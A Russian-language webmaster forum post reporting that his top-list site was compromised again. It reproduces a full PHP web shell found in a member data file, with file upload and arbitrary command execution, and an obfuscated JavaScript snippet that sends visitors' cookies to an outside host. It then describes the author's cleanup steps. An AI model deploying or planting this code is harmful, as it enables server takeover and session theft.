J_Geer
Факин шит! На одном из виртуалов, где все уже вроде вычистил, опять объявился левый код. На этот раз на паре топов появился "пустой" мембер (мыло не приходило, хотя везде выставлено извещать), а memberfiles в файле member_name.dat сидел вот такой код:
<html>
<head>
<title>uploader</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<style type="text/css">
<!--
body { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px}
a { color: #000000; text-decoration: none}
a:hover { color: #000066; text-decoration: underline}
-->
</style>
</head>
<body bgcolor="#999999" text="#000000">
<center>
<table width="700" border="0" bgcolor="#000066">
<tr>
<td>
<table width="100%" border="0" bgcolor="#CCCCCC">
<tr>
<td>
<p><font size="2"><b><font color="#FF0000"> System:
<font color="#000000">
<? passthru("uname -a"); ?>
</font><br>
Our permissions: <font color="#000000">
<? passthru("id"); ?>
</font><br>
Our locality: <font color="#000000">
<? passthru("pwd"); ?>
</font></font></b></font></p>
<pre>
<?php
// FILE UPLOAD
$uploaded = $_FILES['userfile']['tmp_name'];
if (file_exists($uploaded)) {
$pwd_dir = $_POST['dira'];
$real = $_FILES['userfile']['name'];
$destination = $pwd_dir."/".$real;
copy($uploaded, $destination);
echo "Uploaded process:";
print_r ($_FILES);
echo "FILE UPLOADED TO $destination";
} else {
echo " No file uploaded";
}
?> </pre> <form name="form1" method="post" enctype="multipart/form-data">
<table width="100%" border="0">
<tr>
<td width="35%"><font size="2"><b> Browse file
to upload:</b></font></td>
<td width="65%">
<input type="file" name="userfile" size="45">
</td>
</tr>
<tr>
<td width="35%"><b><font size="2"> Destination:</font></b></td>
<td width="65%">
<input type="text" name="dira" size="45" value="<? passthru("pwd"); ?>">
<input type="submit" name="submit2" value="upload">
</td>
</tr>
<tr>
<td width="35%">
<div align="right"> </div>
</td>
<td width="65%"> </td>
</tr>
<tr>
<td width="35%"><b><font size="2"> Command to execute:</font></b></td>
<td width="65%">
<input type="text" name="cmd" size="45" value="<? echo $_POST['cmd']; ?>">
<input type="submit" name="submit" value="execute">
</td>
</tr>
<tr>
<td width="35%">
<div align="right"> </div>
</td>
<td width="65%"> </td>
</tr>
</table>
</form>
<p>
<pre>
<?
// command output
if ($_POST['cmd']){
$cmd = $_POST['cmd'];
echo "$cmd executed...<br>";
passthru("$cmd");
}
else {
echo "No shell command executed";
}
?></pre>
<div align="right"> <font size="1"><b>2003 © </b></font> </div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</body>
</html>
и опять поменяло код в auxout+noref на
"><script>eval(String.fromCharCode(105,109,103,32,61,32,110,101,119,32,73,109,97,103,101,40,41,59,32,105,109,103,46,115,114,99,32,61,32,34,104,116,116,112,58,47,47,115,46,120,116,100,115,46,105,110,47,115,46,112,104,112,63,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59))</script><a href=http://your_noref_url \
В остальном топы работали нормально, темплейты под 555 и индексы целые. На другом виртуале пока все в порядке.
Опять вычистил все и поменял права на auxout.dat на 444. Хрен с ней, со статистикой, задрало уже чистить это г...но через день.
Видимо, эта хрень все-таки через сабмит-форму лезет. Видимо надо менять сабмит на чисто мыльный...